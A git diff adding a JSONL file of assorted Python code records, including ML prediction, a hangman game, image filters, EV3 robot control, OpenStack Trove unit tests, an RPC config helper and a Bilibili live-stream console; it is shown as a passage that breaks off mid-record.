diff --git "a/5165.jsonl" "b/5165.jsonl" new file mode 100644--- /dev/null +++ "b/5165.jsonl" @@ -0,0 +1,733 @@ +{"seq_id":"105133039","text":"# Random forest\n# got some code from here: \n# http://blog.yhat.com/posts/random-forests-in-python.html\n#\n\nimport MySQLdb\nimport numpy as np\nimport pandas as pd \nimport pickle\nfrom sklearn.ensemble import RandomForestClassifier\n\ndb = MySQLdb.connect(\"localhost\", \"python\", \"password\", \"talkingdata\")\n\ndef run_query(table, startRow, limit):\n \"\"\"runs a mysql query and returns a data frame\"\"\"\n query = \"\"\"SELECT os, ip, device, \\\n channel, app, \\\n YEAR(click_time) AS year, \\\n MONTH(click_time) AS month, \\\n DAY(click_time) AS date, \\\n DAYOFWEEK(click_time) AS day, \\\n HOUR(click_time) AS hour, \\\n MINUTE(click_time) as minute\"\"\"\n\n if 'train' in table:\n query = query + \"\"\", is_attributed\"\"\"\n else:\n query = query + \"\"\", click_id\"\"\"\n\n query = query + \"\"\" FROM \"\"\" + table + \\\n \"\"\" LIMIT \"\"\" + str(limit) + \\\n \"\"\" OFFSET \"\"\" + str(startRow) + \"\"\";\"\"\"\n db.query(query)\n dbResult = db.store_result()\n dbFetched = dbResult.fetch_row(maxrows = 0, how = 2)\n queryDF = pd.DataFrame.from_records(dbFetched)\n return queryDF\n\ntotalFits = 93\nallFits = []\nfor i in range(totalFits):\n allFits.append(pickle.load(open('processing/submission2/rfc' + \n str(i + 1) + '.sav', 'rb')))\n\n# Predicting\n\nmaxRows = 18790469\ntrainingRows = 500000\n\npredHeaders = pd.DataFrame(columns = ['click_id'] + \n list(range(len(allFits))))\npredHeaders.to_csv('processing/submission2/allPreds.csv', index = False)\n\nfor i in range(0, maxRows, trainingRows):\n print(str(i) + '/' + str(maxRows))\n #Each list is the predictions for one fit\n allPreds = [list() for i in allFits] \n test = run_query('test', i, trainingRows)\n clickID = list(test['test.click_id'])\n test.drop('test.click_id', axis = 1, inplace = True)\n for i in range(len(allFits)):\n allPreds[i].extend(allFits[i].predict(test))\n allPredsDF = pd.DataFrame(pd.Series(clickID), columns = ['click_id'])\n for i in range(len(allPreds)):\n allPredsDF[str(i)] = pd.Series(allPreds[i])\n with open('processing/submission2/allPreds.csv', 'a') as f:\n allPredsDF.to_csv(f, header = False, index = False)\n\n\n\n\n","sub_path":"submission2_predicting.py","file_name":"submission2_predicting.py","file_ext":"py","file_size_in_byte":2306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"276742906","text":"import random\n\nHANGMANPICS = ['''\n +---+\n | |\n |\n |\n |\n |\n=========''', '''\n +---+\n | |\n O |\n |\n |\n |\n=========''', '''\n +---+\n | |\n O |\n | |\n |\n |\n=========''', '''\n +---+\n | |\n O |\n /| |\n |\n |\n=========''', '''\n +---+\n | |\n O |\n /|\\ |\n |\n |\n=========''', '''\n +---+\n | |\n O |\n /|\\ |\n / |\n |\n=========''', '''\n +---+\n | |\n O |\n /|\\ |\n / \\ |\n |\n=========''']\n\nwords = 'ant baboon badger bat bear beaver camel cat clam cobra cougar coyote crow deer dog donkey duck eagle ferret fox frog goat goose hawk lion lizard llama mole monkey moose mouse mule newt otter owl panda parrot pigeon python rabbit ram rat raven rhino salmon seal shark sheep skunk sloth snake spider stork swan tiger toad trout turkey turtle weasel whale wolf wombat zebra'.split()\n\n\nMissed_letters = 'Missed letters: '\nsecret_word = words[random.randint(0,len(words)-1)]\nblank_letters = list(\"_ \"*len(secret_word))\nwrong_guesses = 0\n\n\nprint(\"H A N G M A N\")\n\ngameOn = True\n\nwhile gameOn:\n print(secret_word)\n print(HANGMANPICS[wrong_guesses])\n if wrong_guesses == 6:\n print(\"Sorry, you ran out of guesses! Game over!\")\n break\n print(Missed_letters)\n print(''.join(blank_letters))\n stripped_word = [x for x in blank_letters if x.strip()]\n if secret_word == ''.join(stripped_word):\n print(\"Good work! You won!\")\n break\n guess = input(\"Guess a letter.\\n\")\n if len(guess) != 1:\n guess = input(\"Enter a single letter, please.\\n\")\n if guess not in secret_word:\n wrong_guesses += 1\n Missed_letters += guess\n else:\n if secret_word.count(guess) > 1:\n word_loc = secret_word.find(guess)\n while blank_letters[word_loc*2] == guess:\n word_loc = secret_word.find(guess, word_loc+1)\n else:\n blank_letters[word_loc*2] = guess\n else:\n word_loc = secret_word.find(guess)\n blank_letters[word_loc*2] = guess\n\n \n \n","sub_path":"hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"297041699","text":"import numpy as np\nimport cv2\n\n######## 四个不同的滤波器 #########\nimg = cv2.imread('test.jpg')\n# 平滑线性滤波滤波\nimg_mean = cv2.blur(img, (5, 5))\n# 高斯滤波\nimg_Guassian = cv2.GaussianBlur(img, (5, 5), 0)\n# 中值滤波\nimg_median = cv2.medianBlur(img, 5)\n# 双边滤波\nimg_bilater = cv2.bilateralFilter(img, 9, 75, 75)\n","sub_path":"chapter-2/2.1.2-filter.py","file_name":"2.1.2-filter.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"137326600","text":"\"\"\"\nMini-application: Buttons on a Tkinter GUI tell the robot to:\n - Go forward at the speed given in an entry box.\n\nAlso: responds to Beacon button-presses by beeping, speaking.\n\nThis module runs on the ROBOT.\nIt uses MQTT to RECEIVE information from a program running on the LAPTOP.\n\nAuthors: David Mutchler, his colleagues, and Jeremy Roy.\n\"\"\"\n\nimport rosebotics_new as rb\nimport time\nimport mqtt_remote_method_calls as com\nimport ev3dev.ev3 as ev3\n\n\ndef main():\n robot = rb.Snatch3rRobot()\n\n rc = RemoteControlEtc(robot)\n mqtt_client = com.MqttClient(rc)\n rc.mqtt_client = mqtt_client\n mqtt_client.connect_to_pc()\n\n while True:\n if robot.beacon_button_sensor.is_top_red_button_pressed():\n ev3.Sound.beep().wait()\n if robot.beacon_button_sensor.is_top_blue_button_pressed():\n ev3.Sound.speak('Hello, how are you?')\n time.sleep(0.01) # For the delegate to do its work\n\n\nclass RemoteControlEtc(object):\n def __init__(self, robot):\n \"\"\"\n Stores the robot.\n :type robot: rb.Snatch3rRobot\n \"\"\"\n self.robot = robot\n self.mqtt_client = None\n\n def go_forward(self, speed_string):\n \"\"\"makes the robot go forward at the given speed\"\"\"\"\"\n print('telling the robot to start moving at', speed_string)\n speed = int(speed_string)\n self.robot.drive_system.start_moving(speed, speed)\n\n def follow_path(self):\n while True:\n x = self.robot.color_sensor.get_reflected_intensity() # 100 in intensity is white, 1 through 4 is black\n print(x)\n if x <= 10:\n self.robot.drive_system.start_moving(left_wheel_duty_cycle_percent=45,\n right_wheel_duty_cycle_percent=45)\n if x >= 10: # go counterclockwise in this case\n self.robot.drive_system.start_moving(left_wheel_duty_cycle_percent=0, right_wheel_duty_cycle_percent=50)\n\n if x >= 20 and x <= 25:\n self.robot.drive_system.stop_moving()\n self.mqtt_client.send_message('handle_increment_progress_bar')\n time.sleep(1.5)\n ev3.Sound.beep()\n self.mqtt_client.send_message('handle_increment_progress_bar')\n time.sleep(1.5)\n ev3.Sound.speak('I found blue!')\n self.mqtt_client.send_message('handle_increment_progress_bar')\n time.sleep(1.5)\n ev3.Sound.beep()\n self.mqtt_client.send_message('handle_increment_progress_bar')\n time.sleep(1.5)\n self.robot.drive_system.spin_in_place_degrees(360)\n self.mqtt_client.send_message('handle_increment_progress_bar')\n time.sleep(3)\n break\n\n if x >= 74 and x <= 80:\n self.robot.drive_system.stop_moving()\n self.mqtt_client.send_message('handle_increment_progress_bar')\n time.sleep(1.5)\n ev3.Sound.beep()\n self.mqtt_client.send_message('handle_increment_progress_bar')\n time.sleep(1.5)\n ev3.Sound.speak('I found red!')\n self.mqtt_client.send_message('handle_increment_progress_bar')\n time.sleep(1.5)\n ev3.Sound.beep()\n self.mqtt_client.send_message('handle_increment_progress_bar')\n time.sleep(1.5)\n self.robot.drive_system.spin_in_place_degrees(720)\n self.mqtt_client.send_message('handle_increment_progress_bar')\n time.sleep(3)\n break\n\n if x >= 15 and x <= 19:\n self.robot.drive_system.stop_moving()\n self.mqtt_client.send_message('handle_increment_progress_bar')\n time.sleep(1.5)\n ev3.Sound.beep()\n self.mqtt_client.send_message('handle_increment_progress_bar')\n time.sleep(1.5)\n ev3.Sound.speak('I found green!')\n self.mqtt_client.send_message('handle_increment_progress_bar')\n time.sleep(1.5)\n ev3.Sound.beep()\n self.robot.drive_system.spin_in_place_degrees(180)\n self.mqtt_client.send_message('handle_increment_progress_bar')\n time.sleep(3)\n break\n\n if self.robot.proximity_sensor.get_distance_to_nearest_object_in_inches() <= 4:\n ev3.Sound.beep()\n ev3.Sound.speak('There is something in my way!')\n ev3.Sound.beep()\n\n def path_by_color(self):\n x = self.robot.color_sensor.get_reflected_intensity()\n\n if x >= 20 and x <= 25:\n ev3.Sound.speak('I found blue!')\n self.robot.drive_system.spin_in_place_degrees(360)\n\n if x >= 74 and x <= 80:\n ev3.Sound.speak('I found red!')\n self.robot.drive_system.spin_in_place_degrees(720)\n\n if x >= 15 and x <= 19:\n ev3.Sound.speak('I found green!')\n self.robot.drive_system.spin_in_place_degrees(180)\n\n\nmain()\n","sub_path":"src/Capstone_royjm_runs_on_robot.py","file_name":"Capstone_royjm_runs_on_robot.py","file_ext":"py","file_size_in_byte":5160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"600727196","text":"# Copyright 2013 Hewlett-Packard Development Company, L.P.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n#\nimport sqlalchemy.engine.base\nimport testtools\nimport mockito\nfrom mockito import when, never\nimport mockito.matchers as matchers\nimport ConfigParser\nimport sqlalchemy\nimport keystoneclient.v2_0.client as ksclient\n\nimport trove.common.context as context\nimport trove_ext.mappedid.mapped_id_manager as mapmgr\nimport trove_ext.mappedid.models as models\n\n\ndef query_contains(query_string):\n return QueryContains(query_string)\n\n\nclass QueryContains(matchers.Matcher):\n def __init__(self, sub):\n self.sub = sub\n\n def matches(self, arg):\n return self.sub and len(self.sub) > 0 and str(arg).find(self.sub) > -1\n\n def __repr__(self):\n return \"\" % self.sub\n\n\nclass TestMappedIdManager(testtools.TestCase):\n def setUp(self):\n super(TestMappedIdManager, self).setUp()\n # stub config\n when(ConfigParser.ConfigParser).get('MAPPED_ID').thenReturn(None)\n when(ConfigParser.ConfigParser).get('MAPPED_ID',\n mockito.any()).thenReturn(\"*\")\n when(ConfigParser.ConfigParser).get(\n 'KEYSTONE', 'keystone_admin_role').thenReturn(\"fake_admin_role_id\")\n # stub sql engine\n self.mock_conn = mockito.mock(sqlalchemy.engine.base.Connection)\n mock_engine = mockito.mock(sqlalchemy.engine.Engine)\n when(sqlalchemy).create_engine(\n mockito.any(),\n pool_recycle=7200,\n echo=True,\n listeners=mockito.any([])).thenReturn(mock_engine)\n when(mock_engine).connect().thenReturn(self.mock_conn)\n # stub db query results\n self.mapped_tenant_user_result = mockito.mock(\n sqlalchemy.engine.base.ResultProxy)\n self.mapped_tenant_result = mockito.mock(\n sqlalchemy.engine.base.ResultProxy)\n self.mapped_user_result = mockito.mock(\n sqlalchemy.engine.base.ResultProxy)\n # stub keystone\n mock_ksclient = mockito.mock(ksclient.Client)\n when(ksclient).Client(\n username=mockito.any(),\n password=mockito.any(),\n tenant_name=mockito.any(),\n auth_url=mockito.any(),\n insecure=mockito.any()).thenReturn(mock_ksclient)\n self.mock_role_mgr = mockito.mock(ksclient.roles.RoleManager)\n mock_ksclient.roles = self.mock_role_mgr\n when(self.mock_role_mgr).find(name=\"_member_\").thenReturn(\n ksclient.roles.Role(self.mock_role_mgr,\n {'id': '1'},\n True))\n self.mock_tenant_mgr = mockito.mock(ksclient.tenants.TenantManager)\n mock_ksclient.tenants = self.mock_tenant_mgr\n self.mock_user_mgr = mockito.mock(ksclient.users.UserManager)\n mock_ksclient.users = self.mock_user_mgr\n\n def tearDown(self):\n super(TestMappedIdManager, self).tearDown()\n # grrr this son-gun caused all sorts of interesting problems\n mapmgr.ENGINE = None\n mockito.unstub()\n models.ENGINE = None\n\n def _expect_no_db_mapped_user(self, tenant='123'):\n when(self.mock_conn).execute(\n query_contains(\n \"%s = \\'%s\\'\" % (models.TENANT_ID, tenant))).thenReturn(\n self.mapped_tenant_user_result)\n self.mapped_tenant_user_result.rowcount = 0\n\n def _expect_no_db_tenant(self, tenant='123'):\n mapped_tenant_name = mapmgr.MappedIdManager._get_mapped_tenant_name(\n tenant)\n self._stub_tenant_db_execute(mapped_tenant_name)\n self.mapped_tenant_result.rowcount = 0\n\n def _stub_tenant_db_execute(self, mapped_tenant_name):\n when(self.mock_conn).execute(\n query_contains(\"%s = \\'%s\\'\" % (\n models.MAPPED_TENANT_NAME,\n mapped_tenant_name))).thenReturn(\n self.mapped_tenant_result)\n\n def _expect_db_tenant(self, tenant=\"123\",\n mapped_tenant_id=\"fake_tenant_id\"):\n mapped_tenant_name = mapmgr.MappedIdManager._get_mapped_tenant_name(\n tenant)\n self._stub_tenant_db_execute(mapped_tenant_name)\n self.mapped_tenant_result.rowcount = 1\n when(self.mapped_tenant_result).fetchone().thenReturn(\n {models.MAPPED_TENANT_NAME: mapped_tenant_name,\n models.MAPPED_TENANT_ID: mapped_tenant_id}\n )\n\n def stub_user_db_execute(self, mapped_user_name):\n when(self.mock_conn).execute(\n query_contains(\n \"%s = \\'%s\\'\" % (\n models.MAPPED_USER_NAME, mapped_user_name))).thenReturn(\n self.mapped_user_result)\n\n def expect_no_db_user(self, user='abc'):\n self.mapped_user_result.rowcount = 0\n mapped_user_name = mapmgr.MappedIdManager._get_mapped_user_name(user)\n self.stub_user_db_execute(mapped_user_name)\n\n def _expect_db_user(self, user=\"abc\",\n mapped_user_id=\"fake_user_id\"):\n mapped_user_name = mapmgr.MappedIdManager._get_mapped_user_name(user)\n self.stub_user_db_execute(mapped_user_name)\n self.mapped_user_result.rowcount = 1\n when(self.mapped_user_result).fetchone().thenReturn(\n {models.MAPPED_USER_NAME: mapped_user_name,\n models.MAPPED_USER_ID: mapped_user_id}\n )\n\n def _expect_ks_create_tenant(self, mapped_tenant_id=\"t_1\"):\n when(self.mock_tenant_mgr).create(\n mockito.any(str), mockito.any(str)).thenReturn(\n ksclient.tenants.Tenant(self.mock_tenant_mgr,\n {\"id\": mapped_tenant_id}, True))\n\n def _expect_ks_create_user(self, mapped_user_id='u_1'):\n when(self.mock_user_mgr).create(\n mockito.any(),\n mockito.any(), \"\").thenReturn(\n ksclient.users.User(self.mock_user_mgr, {'id': mapped_user_id},\n True))\n\n def _expect_ks_add_role(self, role_id='1'):\n when(self.mock_role_mgr).add_user_role(\n mockito.any(str),\n role_id, mockito.any(str)).thenReturn(None)\n\n def test_init_existing_tenant_new_user(self):\n tenant = '123'\n mapped_tenant_id = \"fake_tenant_id\"\n user = 'abc'\n mapped_user_id = \"u_1\"\n self._expect_no_db_mapped_user(tenant=tenant)\n self._expect_db_tenant(tenant=tenant,\n mapped_tenant_id=mapped_tenant_id)\n self.expect_no_db_user(user=user)\n self._expect_ks_create_user(mapped_user_id)\n self._expect_ks_add_role()\n # execute\n mapmgr.MappedIdManager(context.TroveContext(tenant=tenant, user=user))\n # verify\n mockito.verify(self.mock_role_mgr).add_user_role(mapped_user_id, \"1\",\n mapped_tenant_id)\n\n def test_init_existing_tenant_new_user_admin(self):\n tenant = '123'\n mapped_tenant_id = \"t_1\"\n mapped_user_id = \"u_1\"\n self._expect_no_db_mapped_user()\n self._expect_db_tenant(tenant, mapped_tenant_id)\n self.expect_no_db_user()\n self._expect_ks_create_user(mapped_user_id)\n member_role_id = \"1\"\n admin_role_id = \"fake_admin_role_id\"\n self._expect_ks_add_role(member_role_id)\n self._expect_ks_add_role(admin_role_id)\n # execute\n mapmgr.MappedIdManager(context.TroveContext(tenant=tenant, user='abc',\n is_admin=True))\n # verify\n mockito.verify(self.mock_role_mgr).add_user_role(mapped_user_id,\n member_role_id,\n mapped_tenant_id)\n mockito.verify(self.mock_role_mgr).add_user_role(mapped_user_id,\n admin_role_id,\n mapped_tenant_id)\n\n def test_init_existing_tenant_existing_user_no_role(self):\n tenant = '123'\n user = 'abc'\n mapped_tenant_id = 't_1'\n mapped_user_id = 'u_1'\n self._expect_no_db_mapped_user()\n self._expect_db_tenant(tenant, mapped_tenant_id)\n self._expect_db_user(user, mapped_user_id)\n self._expect_ks_add_role()\n # execute\n mapmgr.MappedIdManager(context.TroveContext(tenant=tenant, user=user))\n # verify\n mockito.verify(self.mock_role_mgr).add_user_role(mapped_user_id, \"1\",\n mapped_tenant_id)\n\n def test_init_existing_tenant_existing_user_no_role_rollback(self):\n tenant = '123'\n user = 'abc'\n mapped_tenant_id = 't_1'\n mapped_user_id = 'u_1'\n self._expect_no_db_mapped_user()\n self._expect_db_tenant(tenant, mapped_tenant_id)\n self._expect_db_user(user, mapped_user_id)\n when(self.mock_role_mgr).add_user_role(\n mockito.any(str),\n '1', mockito.any(str)).thenRaise(\n ksclient.exceptions.ClientException(500, \"Uh oh\",\n \"something went wrong\"))\n # execute\n mapmgr.MappedIdManager(context.TroveContext(tenant=tenant, user=user))\n # verify\n mockito.verify(self.mock_role_mgr).add_user_role(mapped_user_id, \"1\",\n mapped_tenant_id)\n mockito.verify(self.mock_conn).execute(query_contains(\"DELETE FROM\"))\n\n def test_init_existing_tenant_existing_user_existing_role(self):\n tenant = '123'\n user = 'abc'\n mapped_tenant_id = 't_1'\n mapped_user_id = \"u_1\"\n self._expect_no_db_mapped_user(tenant)\n self._expect_db_tenant(tenant, mapped_tenant_id)\n self._expect_db_user(user, mapped_user_id)\n when(self.mock_role_mgr).add_user_role(\n mapped_user_id,\n '1', mapped_tenant_id).thenRaise(ksclient.exceptions.Conflict(409))\n # execute\n mapmgr.MappedIdManager(context.TroveContext(tenant=tenant, user=user))\n # verify\n mockito.verify(self.mock_role_mgr).add_user_role(mapped_user_id, \"1\",\n mapped_tenant_id)\n\n def test_init_new_tenant_existing_user(self):\n tenant = '123'\n mapped_tenant_id = \"t_1\"\n user = 'abc'\n mapped_user_id = 'u_1'\n # not even sure this would ever happen\n self._expect_no_db_mapped_user()\n self._expect_no_db_tenant(tenant)\n self._expect_db_user(user, mapped_user_id)\n self._expect_ks_create_tenant(mapped_tenant_id)\n self._expect_ks_add_role()\n # execute\n mapmgr.MappedIdManager(context.TroveContext(tenant=tenant, user=user))\n # verify\n mockito.verify(self.mock_user_mgr, never).create(mockito.any(),\n mockito.any(), \"\")\n mockito.verify(self.mock_role_mgr).add_user_role(mapped_user_id, \"1\",\n mapped_tenant_id)\n\n def test_init_new_tenant_existing_user_tenant_exists_in_keystone(self):\n tenant = '123'\n user = 'abc'\n mapped_user_id = 'u_1'\n self._expect_no_db_mapped_user()\n self._expect_no_db_tenant(tenant=tenant)\n self._expect_db_user(user=user, mapped_user_id=mapped_user_id)\n when(self.mock_tenant_mgr).create(\n mockito.any(str), mockito.any(str)).thenRaise(\n ksclient.exceptions.Conflict(409))\n when(ConfigParser.ConfigParser).getfloat(\n 'MAPPED_ID',\n 'wait_time_for_user_mapping').thenReturn(2)\n when(self.mock_tenant_mgr).find(name=mockito.any(str)).thenReturn(\n ksclient.tenants.Tenant(self.mock_tenant_mgr, {'id': 't_1'}, True))\n self._expect_ks_add_role()\n # execute\n mapmgr.MappedIdManager(context.TroveContext(tenant=tenant, user=user))\n # verify\n mockito.verify(self.mock_role_mgr).add_user_role(mapped_user_id, \"1\",\n \"t_1\")\n","sub_path":"trove_ext/tests/unittests/mappedid/test_mapped_id_manager.py","file_name":"test_mapped_id_manager.py","file_ext":"py","file_size_in_byte":12812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"323963292","text":"import importlib\n\n\ndef rpc(f):\n \"\"\"\n 所有被 rpc 装饰的函数都会在 Configuration 初始化的时候被绑定到 RPCServer 继承的类里\n :case\n @rpc\n def add(x, y):\n return x + y\n \"\"\"\n\n def wrapper(_f):\n return _f\n\n return wrapper(f)\n\n\nclass Configuration(object):\n \"\"\"\n 配置类\n \"\"\"\n\n def __init__(self, config, *args, **kwargs):\n \"\"\"\n 初始化\n :param config: 配置模块,str 类型\n :param args: 预留参数\n :param kwargs: 预留参数\n \"\"\"\n try:\n self._config = __import__(config)\n except Exception:\n raise Exception(\"配置名称不正确\")\n self._tasks = {}\n self._initial_config()\n\n def _initial_config(self):\n \"\"\"\n 初始化基础配置\n \"\"\"\n if not hasattr(self._config, 'INSTALLED_APPS'):\n raise Exception(\"配置中需要有 INSTALLED_APPS 参数\")\n for _app in self._config.INSTALLED_APPS:\n try:\n _module = __import__(_app)\n if hasattr(_module, 'task'):\n for func_name in dir(getattr(_module, 'task')):\n if not func_name.startswith('__') and func_name != 'rpc':\n self._append_task(_app, func_name)\n except Exception:\n raise Exception(\"不存在 {} 这个模块\".format(_app))\n\n @property\n def tasks(self):\n return self._tasks\n\n def _append_task(self, module_name, task_name):\n if module_name in self._tasks:\n self._tasks[module_name].append(task_name)\n else:\n self._tasks[module_name] = [task_name, ]\n\n def bind_class(self, server_class):\n \"\"\"\n 将所有 rpc 装饰的任务绑定到 server_class 类里\n :param server_class: RPCServer 继承的类\n \"\"\"\n for module_name in self._tasks:\n for func_name in self._tasks[module_name]:\n module = importlib.import_module(module_name, __package__)\n setattr(server_class, func_name, staticmethod(getattr(module, func_name)))\n","sub_path":"mprpc_config/rpc_config.py","file_name":"rpc_config.py","file_ext":"py","file_size_in_byte":2168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"590065327","text":"import utils\nfrom statistics import Statistics\nfrom connect import connect\nfrom printer import Printer\nimport threading\nimport asyncio\n\ndef guide_of_console():\n print('___________________________')\n print('| 欢迎使用本控制台 |')\n print('|1 输出本次的参与抽奖统计 |')\n print('|2 输出本次的抽奖结果统计 |')\n print('|3 查看目前拥有礼物的统计 |')\n print('|4 查看持有勋章状态 |')\n print('|5 获取直播个人的基本信息 |')\n print('|6 检查今日任务的完成情况 |')\n print('|7 模拟安卓客户端发送弹幕 |')\n print('|8 模拟电脑网页端发送弹幕 |')\n print('|9 直播间的长短号码的转化 |')\n print(' ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄')\n \n\ndef preprocess_send_danmu_msg_andriod():\n msg = input('请输入要发送的信息:')\n roomid = input('请输入要发送的房间号:')\n Biliconsole().append2list_console([[msg, int(roomid)], utils.send_danmu_msg_andriod])\n \ndef preprocess_send_danmu_msg_web():\n msg = input('请输入要发送的信息:')\n roomid = input('请输入要发送的房间号:')\n Biliconsole().append2list_console([[msg, int(roomid)], utils.send_danmu_msg_web])\n\ndef preprocess_check_room():\n roomid = input('请输入要转化的房间号:')\n Biliconsole().append2list_console([[roomid], utils.check_room])\n\ndef process_send_gift_web():\n Biliconsole().append2list_console([[True], utils.fetch_bag_list])\n bagid = input('请输入要发送的礼物编号:')\n # print('是谁', giftid)\n giftnum = input('请输入要发送的礼物数目:')\n roomid = input('请输入要发送的房间号:')\n Biliconsole().append2list_console([[roomid, [[False, bagid],utils.fetch_bag_list], giftnum, bagid],utils.send_gift_web])\n \ndef preprocess_change_danmuji_roomid():\n roomid = input('请输入roomid')\n connect().reconnect(roomid)\n\ndef change_printer_dic_user():\n new_words = input('弹幕控制')\n if new_words == 'T':\n Printer().dic_user['print_control']['弹幕'] = True\n else:\n Printer().dic_user['print_control']['弹幕'] = False\ndef preprocess_fetch_liveuser_info():\n real_roomid = input('请输入roomid')\n Biliconsole().append2list_console([[real_roomid], utils.fetch_liveuser_info])\n \n\noptions ={\n '1': Statistics().getlist,\n '2': Statistics().getresult,\n '3': utils.fetch_bag_list,#async\n '4': utils.fetch_medal,#async\n '5': utils.fetch_user_info,#async\n '6': utils.check_taskinfo,#async\n '7': preprocess_send_danmu_msg_andriod,#input async\n '8': preprocess_send_danmu_msg_web,#input async\n '9': preprocess_check_room,#input async\n '10': process_send_gift_web,#input async !!!\n '11': preprocess_change_danmuji_roomid,\n '12': change_printer_dic_user,\n '13': preprocess_fetch_liveuser_info,\n 'help': guide_of_console\n}\n\ndef return_error():\n print('命令无法识别,请重新输入')\n\ndef controler():\n while True:\n x = input('')\n # input and async\n if x == ['7', '8', '9', '10', '13']:\n # func = options.get(x, return_error)\n args, func = options.get(x, return_error)()\n #print(args)\n #Biliconsole().append2list_console(answer)\n # async\n elif x in ['3', '4', '5', '6']:\n answer = options.get(x, return_error)\n Biliconsole().append2list_console(answer)\n # normal\n else:\n options.get(x, return_error)()\n \nclass Biliconsole():\n instance = None\n\n def __new__(cls, *args, **kw):\n if not cls.instance:\n cls.instance = super(Biliconsole, cls).__new__(cls, *args, **kw)\n cls.instance.list_console = []\n cls.lock = threading.Lock()\n return cls.instance\n \n def append2list_console(self, request):\n self.lock.acquire()\n self.list_console.append(request)\n self.lock.release()\n \n async def run(self):\n while True:\n len_list_console = len(self.list_console)\n tasklist = []\n for i in self.list_console:\n if isinstance(i, list):\n # 对10号单独简陋处理\n for j in range(len(i[0])):\n if isinstance(i[0][j], list):\n i[0][j] = await i[0][j][1](*(i[0][j][0]))\n task = asyncio.ensure_future(i[1](*i[0]))\n else:\n task = asyncio.ensure_future(i())\n tasklist.append(task)\n if tasklist: \n await asyncio.wait(tasklist, return_when=asyncio.ALL_COMPLETED)\n #print('本批次结束')\n else:\n #print('本批次轮空')\n pass\n \n if len_list_console == 0:\n await asyncio.sleep(1)\n else:\n self.lock.acquire()\n del self.list_console[:len_list_console]\n self.lock.release()\n await asyncio.sleep(0.3)\n \n \n \n \n \n \n","sub_path":"biliconsole.py","file_name":"biliconsole.py","file_ext":"py","file_size_in_byte":5181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"403853160","text":"from baconian.common.plotter import Plotter\nimport glob\nimport os\nimport sys\nfrom baconian.common.error import *\nimport json_tricks as json\nimport pandas as pd\nfrom baconian.common.files import *\nfrom collections import OrderedDict\n\n\nclass SingleExpLogDataLoader(object):\n def __init__(self, exp_root_dir: str):\n self._root_dir = exp_root_dir\n check_file(path=os.path.join(exp_root_dir, 'record', 'final_status.json')) # dir list\n check_file(path=os.path.join(exp_root_dir, 'record', 'global_config.json'))\n self.final_status = load_json(file_path=os.path.join(exp_root_dir, 'record', 'final_status.json'))\n self.global_config = load_json(file_path=os.path.join(exp_root_dir, 'record', 'global_config.json'))\n # check the existence of json files?\n\n def load_record_data(self, agent_log_dir_name, algo_log_dir_name, env_log_dir_name):\n # todo maybe add a verbose mode to load all log\n\n agent_log_dir = os.path.join(self._root_dir, agent_log_dir_name)\n algo_log_dir = os.path.join(self._root_dir, algo_log_dir_name)\n check_dir(agent_log_dir)\n check_dir(algo_log_dir)\n\n def init(self):\n pass\n\n def plot_res(self, sub_log_dir_name, key, index, mode=('line', 'hist', 'scatter'),\n average_over=1, file_name=None, save_format='png',\n ):\n log_name = os.path.join(self._root_dir, 'record', sub_log_dir_name, 'log.json')\n f = open(log_name, 'r')\n res_dict = json.load(f)\n key_list = res_dict[key]\n key_value = OrderedDict()\n key_vector = []\n index_vector = []\n for record in key_list:\n num_index = int(record[index])\n index_vector.append(num_index)\n key_vector.append(record[\"log_val\"])\n key_value[index] = index_vector\n key_value[key] = key_vector\n data = pd.DataFrame.from_dict(key_value) # Create dataframe for plotting\n row_num = data.shape[0]\n column_num = data.shape[1]\n data_new = data\n\n # Calculate mean value in horizontal axis, incompatible with histogram mode\n if average_over != 1:\n if mode != 'histogram':\n new_row_num = int(row_num / average_over)\n data_new = data.head(new_row_num).copy()\n data_new.loc[:, index] = data_new.loc[:, index] * average_over\n for column in range(1, column_num):\n for i in range(new_row_num):\n data_new.iloc[i, column] = data.iloc[i * average_over: i * average_over + average_over,\n column].mean()\n\n if mode == 'histogram':\n histogram_flag = True\n data_new = data.iloc[:, 1:].copy()\n else:\n histogram_flag = False\n if mode == 'scatter':\n scatter_flag = True\n else:\n scatter_flag = False\n\n Plotter.plot_any_key_in_log(data=data_new, index=index, key=key,\n sub_log_dir_name=sub_log_dir_name,\n scatter_flag=scatter_flag, save_flag=True,\n histogram_flag=histogram_flag, save_path=os.path.join(self._root_dir),\n save_format=save_format, file_name=file_name)\n\n\n# TODO\n# key and index, log given = plot figure(curve), average or 10, or set a range\n# normalisation\n\nclass MultipleExpLogDataLoader(object):\n def __init__(self, exp_root_dir_list: str, num: int):\n self._root_dir = exp_root_dir_list\n self.num = num\n for i in range(num):\n exp_root_dir = exp_root_dir_list + \"/exp_\" + str(i)\n SingleExpLogDataLoader(exp_root_dir)\n\n def plot_res(self, key, index, sub_log_dir_name: str, mode=('plot', 'hist', 'scatter'), average_over=1,\n save_format='png', file_name=None,):\n multiple_key_value = {}\n for i in range(self.num):\n log_name = os.path.join(self._root_dir, 'exp_' + str(i), 'record', sub_log_dir_name, 'log.json')\n f = open(log_name, 'r')\n res_dict = json.load(f)\n key_list = res_dict[key]\n key_vector = []\n index_vector = []\n for record in key_list:\n num_index = int(record[index])\n index_vector.append(num_index)\n key_vector.append(record[\"log_val\"])\n 